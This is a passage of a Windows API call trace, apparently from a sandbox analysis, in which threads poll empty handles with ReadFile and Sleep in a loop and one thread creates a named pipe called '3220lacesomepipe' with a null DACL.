	[0255.803] GetLastError () returned 0x218
	[0255.803] Sleep (dwMilliseconds=0xa) 
	[0255.809] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.809] GetLastError () returned 0x218
	[0255.809] Sleep (dwMilliseconds=0xa) 
	[0255.825] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.825] GetLastError () returned 0x218
	[0255.825] Sleep (dwMilliseconds=0xa) 
	[0255.892] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.892] GetLastError () returned 0x218
	[0255.892] Sleep (dwMilliseconds=0xa) 
	[0255.950] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.950] GetLastError () returned 0x218
	[0255.950] Sleep (dwMilliseconds=0xa) 
	[0255.997] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0255.997] GetLastError () returned 0x218
	[0255.997] Sleep (dwMilliseconds=0xa) 
	[0256.042] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.042] GetLastError () returned 0x218
	[0256.042] Sleep (dwMilliseconds=0xa) 
	[0256.050] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.050] GetLastError () returned 0x218
	[0256.050] Sleep (dwMilliseconds=0xa) 
	[0256.088] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.088] GetLastError () returned 0x218
	[0256.088] Sleep (dwMilliseconds=0xa) 
	[0256.090] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.090] GetLastError () returned 0x218
	[0256.090] Sleep (dwMilliseconds=0xa) 
	[0256.106] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.106] GetLastError () returned 0x218
	[0256.106] Sleep (dwMilliseconds=0xa) 
	[0256.122] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.122] GetLastError () returned 0x218
	[0256.122] Sleep (dwMilliseconds=0xa) 
	[0256.215] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.215] GetLastError () returned 0x218
	[0256.215] Sleep (dwMilliseconds=0xa) 
	[0256.262] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.262] GetLastError () returned 0x218
	[0256.262] Sleep (dwMilliseconds=0xa) 
	[0256.309] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.309] GetLastError () returned 0x218
	[0256.309] Sleep (dwMilliseconds=0xa) 
	[0256.356] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.356] GetLastError () returned 0x218
	[0256.356] Sleep (dwMilliseconds=0xa) 
	[0256.371] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.371] GetLastError () returned 0x218
	[0256.371] Sleep (dwMilliseconds=0xa) 
	[0256.387] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.387] GetLastError () returned 0x218
	[0256.387] Sleep (dwMilliseconds=0xa) 
	[0256.480] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.480] GetLastError () returned 0x218
	[0256.480] Sleep (dwMilliseconds=0xa) 
	[0256.542] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.542] GetLastError () returned 0x218
	[0256.543] Sleep (dwMilliseconds=0xa) 
	[0256.589] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.589] GetLastError () returned 0x218
	[0256.589] Sleep (dwMilliseconds=0xa) 
	[0256.610] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.610] GetLastError () returned 0x218
	[0256.610] Sleep (dwMilliseconds=0xa) 
	[0256.621] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.621] GetLastError () returned 0x218
	[0256.621] Sleep (dwMilliseconds=0xa) 
	[0256.636] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.636] GetLastError () returned 0x218
	[0256.637] Sleep (dwMilliseconds=0xa) 
	[0256.652] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.652] GetLastError () returned 0x218
	[0256.652] Sleep (dwMilliseconds=0xa) 
	[0256.710] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.710] GetLastError () returned 0x218
	[0256.710] Sleep (dwMilliseconds=0xa) 
	[0256.745] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.745] GetLastError () returned 0x218
	[0256.745] Sleep (dwMilliseconds=0xa) 
	[0256.793] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.793] GetLastError () returned 0x218
	[0256.793] Sleep (dwMilliseconds=0xa) 
	[0256.839] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.839] GetLastError () returned 0x218
	[0256.839] Sleep (dwMilliseconds=0xa) 
	[0256.855] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.855] GetLastError () returned 0x218
	[0256.855] Sleep (dwMilliseconds=0xa) 
	[0256.870] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.870] GetLastError () returned 0x218
	[0256.870] Sleep (dwMilliseconds=0xa) 
	[0256.887] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.887] GetLastError () returned 0x218
	[0256.887] Sleep (dwMilliseconds=0xa) 
	[0256.902] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.902] GetLastError () returned 0x218
	[0256.902] Sleep (dwMilliseconds=0xa) 
	[0256.918] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0256.918] GetLastError () returned 0x218
	[0256.918] Sleep (dwMilliseconds=0xa) 

Thread:
	id = 192
	os_tid = 0xbc8

	[0191.273] ConvertStringSecurityDescriptorToSecurityDescriptorA () returned 0x0
	[0191.275] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.275] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x116fd30, dwRevision=0x1 | out: pSecurityDescriptor=0x116fd30) returned 1
	[0191.275] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.275] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x116fd30, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x116fd30) returned 1
	[0191.275] lstrlenA (lpString="3220") returned 4
	[0191.275] CreateNamedPipeA (lpName="\\\\.\\pipe\\3220lacesomepipe" (normalized: "\\device\\namedpipe\\3220lacesomepipe"), dwOpenMode=0x3, dwPipeMode=0x0, nMaxInstances=0x1, nOutBufferSize=0x4000, nInBufferSize=0x4000, nDefaultTimeOut=0x0, lpSecurityAttributes=0x116fd4c) returned 0x258
	[0191.276] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0191.276] Sleep (dwMilliseconds=0xa) 
	[0191.334] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.335] GetLastError () returned 0x218
	[0191.335] Sleep (dwMilliseconds=0xa) 
	[0191.381] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.381] GetLastError () returned 0x218
	[0191.381] Sleep (dwMilliseconds=0xa) 
	[0191.444] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.444] GetLastError () returned 0x218
	[0191.444] Sleep (dwMilliseconds=0xa) 
	[0191.490] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.490] GetLastError () returned 0x218
	[0191.490] Sleep (dwMilliseconds=0xa) 
	[0191.536] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.536] GetLastError () returned 0x218
	[0191.537] Sleep (dwMilliseconds=0xa) 
	[0191.587] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.587] GetLastError () returned 0x218
	[0191.587] Sleep (dwMilliseconds=0xa) 
	[0191.634] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.634] GetLastError () returned 0x218
	[0191.634] Sleep (dwMilliseconds=0xa) 
	[0191.646] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.646] GetLastError () returned 0x218
	[0191.647] Sleep (dwMilliseconds=0xa) 
	[0191.662] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.662] GetLastError () returned 0x218
	[0191.662] Sleep (dwMilliseconds=0xa) 
	[0191.678] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.678] GetLastError () returned 0x218
	[0191.678] Sleep (dwMilliseconds=0xa) 
	[0191.694] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.694] GetLastError () returned 0x218
	[0191.694] Sleep (dwMilliseconds=0xa) 
	[0191.713] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.713] GetLastError () returned 0x218
	[0191.713] Sleep (dwMilliseconds=0xa) 
	[0191.725] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.725] GetLastError () returned 0x218
	[0191.725] Sleep (dwMilliseconds=0xa) 
	[0191.741] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.741] GetLastError () returned 0x218
	[0191.741] Sleep (dwMilliseconds=0xa) 
	[0191.756] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.756] GetLastError () returned 0x218
	[0191.756] Sleep (dwMilliseconds=0xa) 
	[0191.772] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.772] GetLastError () returned 0x218
	[0191.772] Sleep (dwMilliseconds=0xa) 
	[0191.787] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.787] GetLastError () returned 0x218
	[0191.787] Sleep (dwMilliseconds=0xa) 
	[0191.803] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.803] GetLastError () returned 0x218
	[0191.803] Sleep (dwMilliseconds=0xa) 
	[0191.819] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.819] GetLastError () returned 0x218
	[0191.820] Sleep (dwMilliseconds=0xa) 
	[0191.834] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.834] GetLastError () returned 0x218
	[0191.834] Sleep (dwMilliseconds=0xa) 
	[0191.849] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.849] GetLastError () returned 0x218
	[0191.850] Sleep (dwMilliseconds=0xa) 
	[0191.865] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.865] GetLastError () returned 0x218
	[0191.865] Sleep (dwMilliseconds=0xa) 
	[0191.881] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.881] GetLastError () returned 0x218
	[0191.882] Sleep (dwMilliseconds=0xa) 
	[0191.896] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.896] GetLastError () returned 0x218
	[0191.897] Sleep (dwMilliseconds=0xa) 
	[0191.913] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.913] GetLastError () returned 0x218
	[0191.913] Sleep (dwMilliseconds=0xa) 
	[0191.929] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.929] GetLastError () returned 0x218
	[0191.929] Sleep (dwMilliseconds=0xa) 
	[0191.943] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.943] GetLastError () returned 0x218
	[0191.943] Sleep (dwMilliseconds=0xa) 
	[0191.959] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.959] GetLastError () returned 0x218
	[0191.959] Sleep (dwMilliseconds=0xa) 
	[0191.974] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.974] GetLastError () returned 0x218
	[0191.974] Sleep (dwMilliseconds=0xa) 
	[0191.990] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0191.990] GetLastError () returned 0x218
	[0191.990] Sleep (dwMilliseconds=0xa) 
	[0192.005] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.005] GetLastError () returned 0x218
	[0192.006] Sleep (dwMilliseconds=0xa) 
	[0192.021] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.021] GetLastError () returned 0x218
	[0192.021] Sleep (dwMilliseconds=0xa) 
	[0192.039] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.039] GetLastError () returned 0x218
	[0192.039] Sleep (dwMilliseconds=0xa) 
	[0192.052] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.052] GetLastError () returned 0x218
	[0192.052] Sleep (dwMilliseconds=0xa) 
	[0192.068] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.068] GetLastError () returned 0x218
	[0192.068] Sleep (dwMilliseconds=0xa) 
	[0192.106] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.106] GetLastError () returned 0x218
	[0192.106] Sleep (dwMilliseconds=0xa) 
	[0192.116] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.116] GetLastError () returned 0x218
	[0192.116] Sleep (dwMilliseconds=0xa) 
	[0192.130] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.130] GetLastError () returned 0x218
	[0192.130] Sleep (dwMilliseconds=0xa) 
	[0192.146] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.146] GetLastError () returned 0x218
	[0192.146] Sleep (dwMilliseconds=0xa) 
	[0192.162] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.162] GetLastError () returned 0x218
	[0192.162] Sleep (dwMilliseconds=0xa) 
	[0192.177] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.177] GetLastError () returned 0x218
	[0192.177] Sleep (dwMilliseconds=0xa) 
